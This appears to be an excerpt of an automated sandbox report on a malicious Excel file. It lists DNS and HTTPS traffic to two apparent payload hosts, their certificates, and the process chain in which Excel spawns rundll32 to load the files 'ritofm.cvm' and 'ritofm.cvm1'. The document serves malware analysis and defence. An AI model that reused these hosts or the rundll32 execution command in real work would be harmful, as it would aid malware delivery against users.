May 12, 2021 20:52:34.683665037 CEST  8.8.8.8    192.168.2.22  0xd372    No error (0)  signifysystem.com      -      192.185.39.58   A (IP address)  IN (0x0001)
May 12, 2021 20:52:37.276567936 CEST  8.8.8.8    192.168.2.22  0xd7b1    No error (0)  fcventasyservicios.cl  -      192.185.32.232  A (IP address)  IN (0x0001)

HTTPS Packets

Each connection lists two certificates from the server's chain: the leaf certificate first, then the issuing intermediate on the following row.

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
May 12, 2021 20:52:35.047568083 CEST | 192.185.39.58 | 443 | 192.168.2.22 | 49165 | CN=cpcontacts.signifysystem.com | CN=R3, O=Let's Encrypt, C=US | Thu Apr 01 17:00:25 CEST 2021 | Wed Jun 30 17:00:25 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
(same connection, intermediate certificate) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |
May 12, 2021 20:52:37.619661093 CEST | 192.185.32.232 | 443 | 192.168.2.22 | 49168 | CN=mail.fcventasyservicios.cl | CN=R3, O=Let's Encrypt, C=US | Tue Mar 16 13:01:12 CET 2021 | Mon Jun 14 14:01:12 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
(same connection, intermediate certificate) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

Code Manipulations


System Behavior

General

Start time: 20:52:37
Start date: 12/05/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f160000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:52:44
Start date: 12/05/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\ritofm.cvm,DllRegisterServer
Imagebase: 0xff960000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:52:45
Start date: 12/05/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\ritofm.cvm1,DllRegisterServer
Imagebase: 0xff960000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
